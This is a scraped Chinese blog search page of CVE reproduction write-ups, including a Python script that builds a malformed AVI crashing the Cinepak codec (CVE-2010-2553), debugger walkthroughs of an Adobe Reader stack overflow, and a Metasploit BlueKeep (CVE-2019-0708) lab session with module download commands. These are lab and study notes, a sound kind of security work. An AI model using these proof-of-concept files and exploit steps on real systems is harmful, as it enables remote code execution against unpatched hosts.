精华内容
下载资源
问答
  • CVE复现计划

    2019-03-19 23:07:59
    去看雪论坛上搜 按时间倒数顺序 太简单的略过 难得不放过 看不懂网上肯定有其它人写的多搜搜 然后多查查资料 从困难中才能学到东西 但是如果真的搞不了,就放一放,过几天再搞 ......

    去看雪论坛上搜

    按时间倒数顺序

    太简单的略过

    难得不放过

    看不懂网上肯定有其它人写的多搜搜

    然后多查查资料

    从困难中才能学到东西

    但是如果真的搞不了,就放一放,过几天再搞

    过几天可能思路就打开了
     

    来自某个学姐的建议 感觉非常有用

    展开全文
  • 堆溢出CVE复现分析(CVE-2010-2553)

    千次阅读 2020-05-20 23:15:54
    CVE 2010-2553漏洞,也称为MicrosoftWindows Cinepak 编码解码器解压缩漏洞,影响的操作系统版本有:Microsoft Windows XP SP2和SP3,WindowsVista SP1和SP2,以及Windows 7。 漏洞原因在于Cinepak 编码解码器对...

    1 实验环境

    操作系统:Window xp sp3
    软件 :Windows Media Player

     

    2 漏洞背景

    CVE 2010-2553漏洞,也称为MicrosoftWindows Cinepak 编码解码器解压缩漏洞,影响的操作系统版本有:Microsoft Windows XP SP2和SP3,WindowsVista SP1和SP2,以及Windows 7。

    漏洞原因在于Cinepak 编码解码器对媒体文件解压缩时代码控制不恰当,可导致远程代码执行。如果用户打开特制的媒体文件,此漏洞可能允许执行代码。如果用户使用管理用户权限登录,成功利用此漏洞的攻击者便可完全控制受影响的系统。

     

    3 实验内容

    首先利用以下的Python代码生成poc.avi文件。

    import sys
    def main():
    
        aviHeaders = '\x52\x49\x46\x46\x58\x01\x00\x00\x41\x56\x49\x20\x4C\x49\x53\x54\xC8\x00\x00\x00\x68\x64\x72\x6C\x61\x76\x69\x68\x38\x00\x00\x00\xA0\x86\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x01\x00\x00\x4E\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x20\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54\x7C\x00\x00\x00\x73\x74\x72\x6C\x73\x74\x72\x68\x38\x00\x00\x00\x76\x69\x64\x73\x63\x76\x69\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xE8\x03\x00\x00\x10\x27\x00\x00\x00\x00\x00\x00\x4E\x00\x00\x00\x20\x74\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x60\x01\x20\x01\x73\x74\x72\x66\x28\x00\x00\x00\x28\x00\x00\x00\x50\x01\x00\x00\x20\x01\x00\x00\x01\x00\x18\x00\x63\x76\x69\x64\x84\x8D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
        padding = '\x4A\x55\x4E\x4B\x00\x00\x00\x00\x4A\x55\x4E\x4B\x00\x00\x00\x00'
        movi_tag = '\x4C\x49\x53\x54\x5C\x00\x00\x00\x6D\x6F\x76\x69\x30\x30\x64\x63\x10\x00\x00\x00'
        cinepak_codec_data1 = '\x00\x00\x00\x68\x01\x60\x01\x20'
        number_of_coded_strips = '\x00\x10'
        cinepak_codec_data2 = '\x10\x00\x00\x10\x00\x00\x00\x00\x00\x60\x01\x60\x20\x00\x00\x00\x11\x00\x00\x10\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x11\x00\x00\x10\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x11\x00\x00\x10\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x11\x00\x00\x10\x41\x00'
        idx_tag = '\x69\x64\x78\x31\x10\x00\x00\x00\x30\x30\x64\x63\x10\x00\x00\x00\x04\x00\x00\x00\x68\x00\x00\x00'
    
        avifile = open('poc.avi', 'wb+')
        avifile.write(aviHeaders)
        avifile.write(padding)
        avifile.write(movi_tag)
        avifile.write(cinepak_codec_data1)
        avifile.write(number_of_coded_strips)
        avifile.write(cinepak_codec_data2)
        avifile.write(idx_tag)
        avifile.close()
        print '[-] AVI file generated'
    
    if __name__ == '__main__':
        main()

    然后利用windbg中的gflag.exe开启windows media player的页堆。(进入到gflag.exe的目录下执行如下命令)

    开启页堆之后,就方便调试了。接下来,首先打开windows media player软件和windbg调试软件。将windows media player附加到windbg上。

    点击OK之后,程序成功在windbg中载入,调试器会显示程序正在被调试。

    接下来将之前生成好的poc.avi拖入windows media player软件中会得到如下结果。

    此时的程序就已经执行断下了,使用kb栈回溯查看触发异常前栈中的内容。

    然后直接使用ub命令依次显示栈回溯中的iccvid+0x22cc和iccvid!DllInstanceInit+0x6279前面的汇编代码。其中在查看iccvid!DllInstanceInit+0x6279前面的汇编代码时,发现它最后调用了一个函数,可能是造成漏洞的原因。

    这里需要对地址0x73b7cbee下断点,但是此时若直接下断点是不会成功的,因为该地址位于iccvid.dll模块中,而iccvid只有在解析poc.avi时才会被动态加载,若重新附加进程运行,里面是没有iccvid.dll模块的。所以首先利用WinDbg的sxe ld:ModuleName即sxe ld:iccvid命令,在程序首次加载iccvid.dll时断下,然后再对0x73b7cbee下断点即可。

    所以现在先关掉当前的调试窗口,重新上述的附加操作,然后再给模块下断。

    接下来查看是否断在了iccvid模块处,确定了之后就可以给地址0x73b7cbee下断点了。

    然后按g开始运行,程序成功断在了指定位置。

    然后按F8进入单步调试,然后一直p单步执行下去。

    此时再用ida分析iccvid.dll模块,同样跳转到地址0x73b7cbee处,看到确实是一个call执行。

     

    进入该函数,首先可以看到它有7个参数

    然后判断第三个参数是否大于等于20h

    下面可以看出,每次循环后,会将edi的地址增加0x2000,注意v32这个变量,第一次其实并没有复制,因为第一次v32为0,也就是说qmemcpy复制两次就会导致堆溢出。

    可以发现,三次循环,edi的值每一次增加了2000h。而由于整个堆空间只有6000h,在拷贝三次后,发生溢出。

     

     

     

     

     

     

     

     

    展开全文
  • 1 实验环境 操作系统:XP SP3 ...CVE-2010-2883是Adobe Reader和Acrobat中的CoolType.dll库在解析字体文件SING表中的uniqueName项时存在栈溢出漏洞。 3 实验内容 首先在系统中找到问题库文件,也就是xp sp3...

    1 实验环境

    操作系统:XP SP3

    调试器:OllyDbg

    反汇编:IDA Pro 7.0

    Adobe Reader : 9.3.4

     

    2 漏洞背景

    CVE-2010-2883是Adobe Reader和Acrobat中的CoolType.dll库在解析字体文件SING表中的uniqueName项时存在栈溢出漏洞。

    3 实验内容

    首先在系统中找到问题库文件,也就是xp sp3中的CoolType.dll库。使用ida分析该动态库,查看多个SING字体出现的代码段附近的代码,可以看到第二个SING的附近调用了strcat函数,该函数就是溢出漏洞所在。

     

    接下来,利用OD对poc文件动态调试,用来理解漏洞的触发机制。首先打开Adobe Reader 9.X,将该进程附加到OD上。

     

     

    使用快捷键ALT+E,在导入库的列表中选择CoolType.dll。

     

    然后开始只能搜索字符串,以查找SING出现的位置,从而定位到strcat函数。

     

    在SING第二次出现的位置附近,找到了strcat的调用代码,在这里设置断点。

     

     

    然后将poc文件拖入OD中,点击运行,程序会断在strcat处。图片右下角处可以看到strcat函数的目的地址和源地址。

     

    利用快捷键ALT+E输入目的地址的值,用来查看目的地址(12E504h)处的数据。将该片区域设置内存访问断点,这样程序每一次访问这片区域中的位置时都会断下来。

     

    多次按F9单步执行后,可以看到目的地址区域的数据已经被修改。又由于没有控制连接的字符的长度,攻击者就可以通过该函数溢出栈,修改栈的返回地址到恶意代码存在的位置。

     

    使用PDFStreamDumper软件查看PDF格式信息及二进制信息,发现12ch处的数据就是被复制到目的地址处的数据。所以攻击者可以修改这一部分,用以产生恶意代码。

     

    持续单步执行至此,发现栈中的栈顶地址为0x0c0c0c0c,指向堆中。

     

    此时F7单步进入,就进入了ROP链。ROP是代码复用技术,即用程序中已有的代码,通过反复跳转执行,完成相应的程序逻辑。持续单步执行,可以看到执行了创建文件的代码,和文件创建位置。

     

    展开全文
  • CVE20190708复现

    千次阅读 2019-11-03 16:09:34
    实验体会:在实验复现的环节你可能会遇到各种的无解问题,在此过程中需要你一步步的耐心摸索,我也是加了很多个班才搞出来的,在实验中,切记要连在同一个网段内,注意攻击模块的更新,以及VM的版本。只要坚持,搞...

    一、实验环境
    基于虚拟机运行(VMware)
    (1)靶机(ip:192.168.8.*):
    在这里插入图片描述
    (2)测试机(192.168.8.#):
    在这里插入图片描述
    (3)将两个虚拟机设置于同一个网段中
    a.在虚拟网络编辑器中,将VMnet0采用桥接模式,并桥接到网线网上
    在这里插入图片描述
    b.设置win7为动态获取ip
    在这里插入图片描述
    c.打开/etc/network/interfaces文件,做如下修改,并保存,重启kali
    在这里插入图片描述
    eth0接口会在系统启动时被自动配置,以DHCP方式配置网卡.
    d.两台主机互ping
    win7
    在这里插入图片描述
    kali在这里插入图片描述
    互ping测试(关掉防火墙)


    测试可以ping通,现在测试机和靶机在同一网段了。
    (3)将靶机的相应端口打开
    在这里插入图片描述
    在防火墙中更改入站设置,同时关闭防火墙,打开3389端口
    在这里插入图片描述
    观察可知,3389端口已打开
    在这里插入图片描述
    二、攻击准备(kali中操作)
    Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。

    进入框架:msfconsole
    使用search命令查找相关漏洞: search ms17-010
    使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue
    使用info查看模块信息: info
    设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp
    查看模块需要配置的参数:show options
    设置参数:set RHOST 192.168.125.138
    攻击:exploit / run

    (1)更新kali msf

    apt-get update
    apt-get  install metasploit-framework
    

    (2)下载利用脚本

    wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
    wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
    wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
    wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
    

    (3)移动到对应的目录

    mv rdp.rb  /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
    mv rdp_scanner.rb  /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
    mv cve_2019_0708_bluekeep.rb   /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
    mv cve_2019_0708_bluekeep_rce.rb   /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
    

    将我需要利用的漏洞载入相关的攻击模块中

    (注意:/usr/share/metasploit-framework/modules/exploits/windows/下面不一定存在rdp目录,不存在时手动创建)
    (4)开始攻击

    msfconsole --进入msf
    reload_all --重新载入所有的模块
    search cve_2019_0708
    use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
    set rhosts 192.168.8.*** --设置靶机ip
    set target 3 --3代表目标机器架构为VMware、2代表目标架构是virtulbox
    exploit --开始攻击
    Kali中的执行过程

    root@debian:~# msfconsole
    [-] ***rting the Metasploit Framework console...|
    [-] * WARNING: No database support: No database YAML file
    [-] ***
                                                      
    
                            
    
    
           =[ metasploit v5.0.53-dev                          ]
    + -- --=[ 1931 exploits - 1079 auxiliary - 331 post       ]
    + -- --=[ 556 payloads - 45 encoders - 10 nops            ]
    + -- --=[ 7 evasion                                       ]
    
    msf5 > reload_all
    [*] Reloading modules from all module paths...
    
                 
    
           =[ metasploit v5.0.53-dev                          ]
    + -- --=[ 1931 exploits - 1079 auxiliary - 331 post       ]
    + -- --=[ 556 payloads - 45 encoders - 10 nops            ]
    + -- --=[ 7 evasion                                       ]
    
    msf5 > search cve_2019_0708
    
    Matching Modules
    ================
    
       #  Name                                            Disclosure Date  Rank    Check  Description
       -  ----                                            ---------------  ----    -----  -----------
       0  auxiliary/scanner/rdp/cve_2019_0708_bluekeep    2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
       1  exploit/windows/rdp/cve_2019_0708_bluekeep_rce  2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
    
    
    msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce  (使用漏洞)
    msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.8.*  (设置靶机的ip)
    rhosts => 192.168.8.*
    msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 3
    target => 3    (在VMware上攻击)
    msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
    
    [*] Started reverse TCP handler on 192.168.8.#:4444     4444开始反向TCP处理程序
    [*] 192.168.8.*:3389    - Detected RDP on 192.168.8.*:3389  ## 在192.168.8.*:3389上检测到RDP (Windows version: 6.1.7601) (Requires NLA: No)
    [+] 192.168.8.*:3389    - The target is vulnerable.(可以攻击)
    [*] 192.168.8.*:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
    [*] 192.168.8.*:3389 - Surfing channels ...
    [*] 192.168.8.*:3389 - Lobbing eggs ...
    [*] 192.168.8.*:3389 - Forcing the USE of FREE'd object ...
    [*] Exploit completed, but no session was created.
    
    

    攻击效果:

    在这里插入图片描述

    三、原理分析
    1.漏洞原理
    远程桌面协议(RDP)支持客户端和服务器之间的连接,并且以虚拟信道的形式定义了它们之间通信的数据。虚拟信道是双向数据管道,可以针对RDP实现扩展。 Windows Server 2000使用RDP 5.1定义了32个静态虚拟信道(Static Virtual Channel, SVC),由于信道数量的限制,进一步定义了动态虚拟信道(Dynamic Virtual Channel, DVC),这些信道包含在专用SVC中。 SVC在会话开始时创建并保持到会话终止,而DVC将会根据是否需要确定是否创建和抛弃。
    a.如下图所示: RDP连接序列在信道安全属性设置之前就进行了连接和设置,这为CVE-2019-0708的创建和传播提供了条件。
    在这里插入图片描述
    如上图所示,RDP Security Commencement在Channel Connection之后

    b.漏洞流量分析: “MS_T120”这个SVC名称在RDP协议的GCC Conference初始化序列时被绑定为数字31的参考信道。此信道名称由Microsoft内部使用,在客户端没有明显的、合法的使用以“MS_T120”命名的SVC来发起请求进行连接的用例,然而,在GCC Conference初始化期间,攻击者可以在31之外的信道上设置另一个名为”MS_T120”的SVC,这种行为将会导致堆内存破坏,最终可以实现远程代码执行。
    详细原理可参考一个大佬写的原理:
    https://www.codercto.com/a/83475.html

    2.漏洞修补
    目前受影响Windows版本

    Microsoft Windows XP 
    
    Microsoft Windows Server 2008 R2 for x64-based Systems SP1
    
    Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
    
    Microsoft Windows Server 2008 for x64-based Systems SP2
    
    Microsoft Windows Server 2008 for Itanium-based Systems SP2
    
    Microsoft Windows Server 2008 for 32-bit Systems SP2
    
    Microsoft Windows Server 2003 
    
    Microsoft Windows 7 for x64-based Systems SP1
    
    Microsoft Windows 7 for 32-bit Systems SP1
    

    解决方案
    修复建议:
    (1)及时安装微软发布的安全更新补丁:
    Microsoft官方已经在 2019年5月14日修复了该漏洞,用户可以通过安装微软的安全更新来给系统打上安全补丁,下载地址为:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
    同时针对已不受微软更新支持的系统Windows Server 2003和Windows XP提供的安全更新,下载地址:https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708

    实验体会:在实验复现的环节你可能会遇到各种的无解问题,在此过程中需要你一步步的耐心摸索,我也是加了很多个班才搞出来的,在实验中,切记要连在同一个网段内,注意攻击模块的更新,以及VM的版本。只要坚持,搞出来是不成问题的!

    展开全文
  • CVE-2018-5711理解与复现

    2018-11-03 23:06:25
    这个CVE复现起来很简单的,直接把Orange大大的两条指令在有漏洞的PHP版本上跑一下就可以看到效果了。 复现之后,大致看了一下代码,感觉没有太多收获…所以决定调试一下PHP 的gd 扩展的源代码,理解一下到底是怎么...
  • 娜璋AI安全之家于2020年8月18日开通,将专注于Python和安全技术,主要分享Web渗透、系统安全、CVE复现、威胁情报分析、人工智能、大数据分析、恶意代码检测等文章。真心想把自己近十年的所学所做所感分享出来,与...
  • CVE-2017-10271复现

    2019-05-27 16:51:00
    最近在工作中偶遇到关于weblogic的几个洞,分别是CVE-2017-10271、CVE-2017-2628等,于是便想着深入学习下这几个漏洞,本篇文章主要复现CVE-2017-10271漏洞,下面会从搭建环境开始一步一步复现 先介绍下环境 ...
  • CVE-2020-24616复现

    千次阅读 2020-09-07 14:35:27
    CVE-2020-24616复现 预警参考链接:https://s.tencent.com/research/bsafe/1102.html 8月底爆出的新漏洞,分析可参考:https://mp.weixin.qq.com/s/IICSnsSgwsjnbImgVP-y5g 参考CVE-2020-8840的复现流程,编写Poc,...
  • 有对CVE漏洞感兴趣的小伙伴看过来
  • CVE-2017-14849复现

    2020-07-18 15:55:14
    CVE-2017-14849复现 cve描述 Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to “…” handling was incompatible with the pathname validation used by ...
  • Cve2019-5418复现

    2019-11-19 23:17:17
    启动目录/rails/CVE-2019-5418,启动命令:docker-compose up -d 随后访问http://you ip:3000 出现欢迎界面,然后访问/robots目录 Burp抓取该目录的数据包,修改accept为如下payload: ../../../../../../etc/...
  • CVE-2019-0708复现

    2019-09-08 22:03:56
    先传送篇文章:CVE-2019-0708漏洞复现及修复补丁 CVE-2019-0708 远程桌面代码执行漏洞复现 复现过程: 1、下载在kali上下载四个脚本命令如下: wget ...
  • 漏洞复现CVE-2020-0796

    2020-12-12 17:39:39
    CVE-2020-0796-简介漏洞名称漏洞类型漏洞等级漏洞描述漏洞版本漏洞复现准备环境发现漏洞修改expMSf监听开打 这是一篇学习他人文章的笔记,如果你对内容感兴趣可以点击下面的链接访问原作者的文章 参考: 漏洞复现 ...
  • CVE-2020-1472复现

    2020-09-21 17:57:21
    CVE-2020-1472复现 简介 Netlogon使用的AES认证算法中的vi向量默认为0,导致攻击者可以绕过认证,同时其设置域控密码的远程接口也使用了该函数,导致可以将域控中保存在AD中的管理员password设置为空 复现环境 DC: ...
  • CVE-2018-8174漏洞复现

    2019-01-09 17:32:37
    CVE-2018-8174漏洞复现
  • CVE-2017-15715 复现

    2020-03-24 17:18:03
    0x00 前言 漏洞这种东西还是复现一遍才行 ...参考https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715 按照vulhub操作 docker-compose build docker-compose up -d 这样操作之后访问http://your-...
  • cve2019-2725复现

    千次阅读 2019-11-19 23:13:52
    此漏洞存在于异步通讯服务,可通过访问路径/_async/AsyncResponseService,判断不安全组件是否开启 docker搭建环境: docker pull ismaleiva90/weblogic12 docker run -d -p 49163:7001 -p 49164:7002 -p ...
  • CVE-2017-11882复现

    千次阅读 2017-11-24 13:51:42
    CVE-2017-11882复现 前言漏洞基本信息 漏洞ID CVE-2017-11882 漏洞名称 Microsoft Office数学公式编辑器内存损坏漏洞 威胁类型 远程代码执行 漏洞类型 栈溢出,位于EQNEDT32.EXE组件中 漏洞影响版本Microsoft ...
  • 复现 CVE-2020-0796

    2020-08-01 05:26:56
    CVE-2020-0796远程代码执行复现 影响范围 Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows Server, Version ...
  • CVE-2019-0718复现

    2021-05-23 23:30:40
    目录介绍环境漏洞复现扫描靶机漏洞利用建立会话不成功,靶机打蓝屏了总结 介绍 CVE-2019-0708是远程桌面服务远程执行代码漏洞利用的是3389端口(rdp) 影响版本: Windows 7 Windows server 2008 R2 Windows server ...
  • CVE-2021-3156 复现

    2021-04-12 13:53:34
    poc :https://github.com/xin02/CVE-2021-3156 受影响版本: Sudo 1.8.2 – 1.8.31p2 Sudo 1.9.0 – 1.9.5p1 git clone https://github.com/blasty/CVE-2021-3156.git cd CVE-2021-3156/ make
  • 复现cve-2020-1938

    2020-02-21 16:03:07
    复现cve-2020-1938 一、介绍 Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。由于Tomcat本身也内含了HTTP服务器,因此也可以视作单独的Web服务器。此漏洞为文件包含漏洞,攻击者可利用该...
  • CVE-2020-0796复现

    2020-09-14 12:27:06
    CVE-2020-0796复现 一、环境基础 靶机:192.168.238.143 Windows10 *64 攻击机:192.168.238.133 kaliLinux 二、使用步骤 1.安装win10系统打开445端口并且关闭防火墙,关闭自动更新 2.两机子能相互ping通 3.下载...
  • CVE-2021-3156复现

    2021-03-04 16:06:11
    几天前爆出了一个高危sudo提权洞,这我立马就来劲了,赶紧过来复现一波涨涨知识。 0x01 漏洞详情 Sudo是一个功能强大的工具,其允许普通用户执行root权限命令,大多数基于Unix和Linux的操作系统都包含sudo。 ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 4,003
精华内容 1,601
关键字:

cve复现